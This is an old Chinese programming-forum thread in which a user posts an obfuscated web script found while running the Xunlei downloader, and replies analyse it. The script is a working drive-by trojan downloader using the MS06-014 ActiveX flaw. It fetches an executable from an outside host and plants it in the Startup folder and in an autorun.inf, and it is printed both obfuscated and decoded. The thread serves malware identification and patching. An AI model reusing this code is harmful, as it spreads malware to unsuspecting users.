运行迅雷时,发现了这段代码,应该是病毒吧?

rengs 2007-10-15 01:29:05
为了防止不小心害人,我将herdow.exe改为herdow.ex
这段代码是在运行迅雷时候,弹出的MicroSoft Script Editor出现的代码。应该是将一个木马下载到你的电脑上去吧?
var id = "\x63\x6C\x61\x73\x73\x69\x64";
var id2 = "\143\154";
var id3 = "\66\103\65\65\66\55\66\65\101\63\55\61\61\104\60";
var id4 = "\163\151\144\72\102\104\71";
var id5 = "\101\55\60\60\103\60\64";
var id6 = "\55\71\70\63";
var id7 = "\106\103\62\71\105\63\66";
var object = document.createElement("o"+"bje"+"ct");
var idx = id2+id4+id3+id6+id5+id7;
object.setAttribute(id,idx);
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open('\107\105\124','http://loveip.ddns.info/love2/herdow.ex',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif';
var cuteqqcn2 = "\103\72\134\134\115\151\143\162\157\123\157\146\164\163\56\160\151\146";
var cuteqqcn3 = "\103\72\134\134\141\165\164\157\162\165\156\56\151\156\146";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
userSend();
...全文
254 6 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
6 条回复
切换为时间正序
请发表友善的回复…
发表回复
UltraBejing 2008-04-30
  • 打赏
  • 举报
回复
有点难度哦
owen1759 2008-01-28
  • 打赏
  • 举报
回复
现在可以查杀到了
Trojan-Downloader.Win32.Banload.ela
请结帖
浪客 2007-10-21
  • 打赏
  • 举报
回复
学习了,厉害。。
owen1759 2007-10-15
  • 打赏
  • 举报
回复
还没说完
那个木马的执行文件,经过检查是用UPX加壳过的,用加壳来避免被杀是常用做法

如果您有新的病毒样本请将病毒样本压缩并加密(密码:virus)后发送到Owen1759[#]sina.com,谢谢!
owen1759 2007-10-15
  • 打赏
  • 举报
回复
<script>
var id = "classid";
var id2 = "cl";
var id3 = "6C556-65A3-11D0";
var id4 = "sid:BD9";
var id5 = "A-00C04";
var id6 = "-983";
var id7 = "FC29E36";
var object = document.createElement("object");
var idx = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
object.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
//以上定义这么多字符串只不过为了拼出最后这个clsid
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open( 'GET ', 'http://loveip.ddns.info/love2/herdow.ex ',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
//以上用xmlhttp向这个地址发出请求
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif ';
var cuteqqcn2 = "C:\\MicroSofts.pif";
var cuteqqcn3 = "C:\\autorun.inf";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
//以上把请求结果写到文件中,导致用户中毒
userSend();
</script>

漏洞名称:MS06-014
漏洞内容: msadco.dll 严重漏洞
漏洞影响:远程执行代码
漏洞等级:严重
关键字:MS06-014, msadco.dll, BD96C556-65A3-11D0-983A-00C04FC29E36, mm.exe
补丁下载:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
================================
我下载了那个地址对应的木马,确实能下载21.0 KB (21,504 字节)
看来是个免杀木马,通过了安全下载组件还通过了卡巴斯基
================================
迅雷经常被人挂马
li_net 2007-10-15
  • 打赏
  • 举报
回复
学习
BHO(Browser Helper Object,浏览器辅助对象,简称BHO)   BHO是微软推出的作为浏览器对第三方程序员开放交互接口的业界标准,通过简单的代码就可以进入浏览器领域的“交互接口”(INTERACTIVED Interface)。通过这个接口,程序员可以编写代码获取浏览器的行为,比如“后退”、“前进”、“当前页面”等,利用BHO的交互特性,程序员还可以用代码控制浏览器行为,比如修改替换浏览器工具栏,添加自己的程序按钮等。这些在系统看来都是没有问题的。BHO原来的目的是为了更好的帮助程序员打造个性化浏览器,以及为程序提供更简洁的交互功能,现在很多IE个性化工具就是利用BHO的来实现。 编辑本段 技术优势   “浏览器劫持”是一种不同于普通病毒木马感染途径的网络攻击手段,而是使用各种技术(如DLL插件等)插件对用户的浏览器进行篡改。安装后,它们会成为浏览器的一部分,可以直接控制浏览器进行指定的操作,根据需要,可以让你打开指定的网站,甚至是收集你系统中的各种私密信息。最可怕的是只有当浏览器已经被劫持了,你才会发现,反应过来,原来电脑已经出现了问题。比如IE主页被改,开机就会弹出广告等等。目前,浏览器劫持已经成为Internet用户最大的威胁之一。其实“浏览器劫持”就是通过BHO的技术手段进入你的系统的,而这种技术是合法的。   从某种观点看,Internet Explorer同普通的Win32程序没有什么两样。借助于BHO,你可以写一个进程内COM对象,这个对象在每次启动都要加载。这样的对象会在与浏览器相同的上下文中运行,并能对可用的窗口和模块执行任何行动。例如,一个BHO能够探测到典型的事件,如GoBack、GoForward、DocumentComplete等;另外BHO能够存取浏览器的菜单与工具栏并能做出修改,还能够产生新窗口来显示当前网页的一些额外信息,还能够安装钩子以监控一些消息和动作。 编辑本段 注册表位置   BHO在注册表中的位置是:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects,有兴趣的朋友可以在这里做做实验。不过一定要记住你更改的每一步,否则会出错的哦!   BHO对象依托于浏览器主窗口。实际上,这意味着一旦一个浏览器窗口产生,一个新的BHO对象实例就要生成。任何 BHO对象与浏览器实例的生命周期是一致的。其次, BHO仅存在于Internet Explorer 4.0及以后版本中。   如果你在使用Microsoft Windows? 98, Windows 2000, Windows 95, or Windows NT版本4.0 操作系统的话,也就一块运行了活动桌面外壳4.71,BHO也被 Windows资源管理器所支持。 BHO是一个COM进程内服务,注册于注册表中某一键下。在启动,Internet Explorer查询那个键并把该键下的所有对象预以加载。   迅雷中TDAtOnce_Now.dll和xunleiBHO_Now.dll为安全   如何发现BHO里面的危险模块.   首先有一个能够查看进程的软件 冰刃就不错 下面以它为例:   先打开冰刃—会看到一个BHO在这里就可以看到危险BHO进程了

4,008

社区成员

发帖
与我相关
我的任务
社区描述
它是一种微软环境下的轻量级的解释型语言,它使用COM组件、WMI、WSH、ADSI访问系统中的元素,对系统进行管理。
社区管理员
  • vbScript社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧